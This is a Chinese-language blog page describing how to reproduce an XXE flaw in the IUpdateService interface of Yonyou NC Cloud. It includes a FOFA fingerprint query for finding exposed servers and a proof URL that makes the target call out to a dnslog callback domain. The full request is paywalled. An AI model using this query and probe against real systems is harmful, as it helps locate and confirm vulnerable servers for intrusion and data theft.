用友NC Cloud IUpdateService接口存在XXE漏洞

最新推荐文章于 2024-04-10 22:49:51 发布
最新推荐文章于 2024-04-10 22:49:51 发布
阅读量232 收藏
点赞数
分类专栏: 漏洞复现 文章标签: 网络 tcp/ip 网络协议 安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/nnn2188185/article/details/135563740
版权

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 用友NC 简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

用友网络是全球领先的企业与公共组织软件、云服务、金融服务提供商。提供营销、制造、财务、人力等产品与服务,帮助客户实现发展目标,进而推动商业和社会进步。

2.漏洞描述

NC Cloud是用友推出的大型企业数字化平台。 用友网络科技股份有限公司NC Cloud存在任意文件上传漏洞,攻击者可利用该漏洞获取服务器控制权。该系统IUpdateService接口存在实体注入漏洞

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

用友NC Cloud

图片

用友NC Cloud IUpdateService接口存在XXE漏洞

4.fofa查询语句

icon_hash="1085941792"

5.漏洞复现

漏洞链接:https://127.0.0.1/uapws/service/nc.uap.oba.update.IUpdateService?xsd=http://oejrpmpeuztlbrls.f2coeq.dnslog.cn

漏洞数据包:

GET /uapws/service/
了解本专栏 订阅专栏 解锁全文 超级会员免费看
sublime88
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
漏洞复现】用友NC-Cloud ConfigResourceServlet 反序列化漏洞
qq_67810151的博客
04-16 386
用友NC 存在反序列化漏洞,未授权的攻击者可以通过该漏洞执行任意命令,从而控制服务器。
用友NC Cloud soapFormat.ajax接口XXE漏洞复现 [附POC]
薛定谔嘚喵博客
01-08 566
用友 NC Cloud,大型企业数字化平台, 聚焦数字化管理、数字化经营、数字化商业,帮助大型企业实现 人、财、物、客的全面数字化,从而驱动业务创新与管理变革,与企业管理者一起重新定义未来的高度。为客户提供面向大型企业集团、制造业、消费品、建筑、房地产、金融保险等14个行业大类,68个细分行业,涵盖数字营销、智能制造、财务共享、数字采购等18大解决方案,帮助企业全面落地数字化。用友NC Cloud soapFormat.ajax接口XXE漏洞
XXE漏洞详解【内含vulnhub靶场XXE Lab:1详解】
07-30
内含xxe漏洞原理,以及该漏洞的多种利用方式,同时根据八个具体案例详细描述漏洞的利用方式。 【想要搭建vulnhub内靶场可关注博主,然后私聊我哦】 同时内含vulnhub中xxe lab:1靶场的过关记录 渗透思路: 由于网站信息什么都没有给出,首先判断靶场搭建的ip【实在判断不出来可以nmap扫一下,找到开放80端口的ip】 得到ip后,可以使用burpsuite进行目录爬取,得到sitemap后就可以对相应可疑站点进行测试,由于该靶场为xxe漏洞靶场,找到对应的登录页面抓包进行构造payload进行测试,其中具体构造payload并找到对应flag见pdf所示。 资源使用人群:前后端有一定了解,具备一些安全方面知识,但不多,保姆级教程,只要你想学就能学会。 工具:忍者渗透测试系统【burpsuite,nmap,base32解密,php在线运行环境,base64解密,cmd5在线平台】
用友NC-Cloud INtbOBAWebService xxe漏洞
weixin_52204925的博客
02-28 801
该系统/uapws/service/nc.itf.tb.oba.INtbOBAWebService接口存在XXE漏洞,恶意攻击者可能会利用该命令在xml中构造恶意命令,可能会导致服务器失陷或者敏感信息泄露。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 400
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
用友uapws系统某接口存在任意文件读取漏洞
weixin_43167326的博客
03-08 456
用友此系统是一款全面的企业管理软件,涵盖财务、人力资源、供应链等多个领域,助力企业实现信息化管理和业务优化。此系统某接口存在任意文件读取漏洞
用友NC Cloud soapFormat.ajax接口存在XXE漏洞
weixin_62352348的博客
01-13 471
用友NC Cloud soapFormat.ajax接口存在XXE漏洞
用友 NC IUpdateService XXE漏洞复现
0xSec
01-06 1046
用友 NC IUpdateService接口存在XML实体注入漏洞,未经身份认证的攻击者可以通过此漏洞获取敏感信息,读取系统内部文件,使系统处于极不安全状态。
NC ws接口XXE注入
guaizang的博客
04-03 671
有风险的地方有两个 1.接口返回xml的格式化操作,SoapFormatAction,但是一般都打了补丁做了处理 实际上还可以在org.apache.xalan.transformer.TransformerIdentityImpl里解析之前加上下面代码也可以防止注入 2.调用接口时,一般来说如果服务是由home里startup.bat/startup.sh来启动的话是不会有风险的,但如果服务是由...
用友NC远程命令执行漏洞通告
爱国小白帽
06-04 9314
用友NC远程命令执行漏洞通告 360-CERT [三六零CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年06月04日, 360CERT监测发现国内安全组织发布了用友NC远程命令执行漏洞的风险通告,漏洞等级:高危。 用友NC是一款企业级管理软件,在大中型企业广泛使用。实现建模、开发、继承、运行、管理一体化的IT解决方案信息化平台。 用友NC存在反序列化漏洞,攻击者通过构造特定的HTTP请求,可以在目标服务器上远程执行任意命令。 目前该漏洞暂无安全补丁发布,360
用友OA/NC/NCCloud漏洞集合
qq_53229503的博客
08-16 7994
用友OA/NC/NCCloud漏洞集合
5、XXE漏洞pdf资料
10-15
5、XXE漏洞
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
09-15
第五节 XXE漏洞利用 - 任意文件读取 无回显 -01
105-web漏洞挖掘之XXE漏洞1
08-03
1. 示例中是一般实体引用(即“&[name] 2. 示例中若使用FILE等其他协议,不一定是发起网络请求(源代码中定义的方法名 3. 不同的编程语言和XML解
【复现】用友NC-Cloud文件上传漏洞_70
最新发布
fushuang333的博客
04-10 551
【复现】用友NC-Cloud文件上传漏洞,上传文件漏洞的影响可能会非常严重,上传可执行代码可能让攻击者获得服务器控制权。
史上最全!用友NC 漏洞汇总
2301_80115097的博客
12-01 773
参数可以读取下列所有文件,在某些情况下可以读取利用目录穿越可读取/etc/passwd等文件。版本存在未授权文件上传漏洞,攻击者可以未授权上传任意文件,进而获取服务端控制权限。版本存在反序列化漏洞,攻击者可以执行系统命令,获取服务端权限。账户密码随便填,抓包将返回包0改为1,即可任意用户登录。在其中有个接口可以获取数据库账户密码,不过是老版本了。文件管理登录页面对用户名参数没有过滤,存在ncDecode---用友nc数据库密码解密。存在远程命令执行漏洞,通过。用友NC-OA漏洞合集。
【0day】复现用友CRM系统任意文件读取漏洞
记录并分享学习安全的知识点..
07-07 569
用友TurboCRM一直致力于为客户提供架构完整、功能全面、具有良好伸缩性的产品,以支持客户业务的快速变化与成长。产品信息用友TurboCRM产品线由包括支持全面客户接触的TurboCTI和用友TurboLINK,匹配多业务模式和业务管理的用友TurboKEY和用友TurboCRM,支持与ERP等软件无缝联接、整合应用的用友TurboEAI,满足业务决策和商业智能应用用友TurboDSS系统构成。用友TurboCRM存在任意文件读取漏洞
用友NC 漏洞汇总(转载)
xiaobai_20190815的博客
11-21 8827
用友NC 漏洞汇总
致远oa getajaxdataservlet接口存在xxe漏洞
01-23
致远OA的GetAjaxDataServlet接口存在XXE漏洞,这是一种XML外部实体注入漏洞。攻击者可以利用这个漏洞向服务器发送恶意XML文件,并利用此文件来读取服务器上的敏感文件或执行远程命令。如果这个漏洞被成功利用,攻击者可能会窃取用户数据、破坏系统、或者获取管理员权限。 为了解决这个漏洞,致远OA的开发团队首先需要对GetAjaxDataServlet接口进行深入的安全审计,找出漏洞的具体位置和原因。然后,他们需要及时修复漏洞,更新软件版本并通知用户进行及时更新。另外,他们也需要在软件开发过程中加强安全意识,采用安全编码规范,避免类似的漏洞再次出现。 对于系统管理员和用户来说,需要及时关注致远OA官方的安全公告,了解漏洞的风险和影响范围,及时安装官方发布的补丁或更新版本。另外,管理员还需要加强系统的安全配置,限制网络访问权限,以减少漏洞被利用的机会。 最后,致远OA的用户也需要注意不在未知的或不信任的网络环境下访问OA系统,避免泄露个人信息或者造成系统安全问题。大家都应该共同努力来保障OA系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

sublime88

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值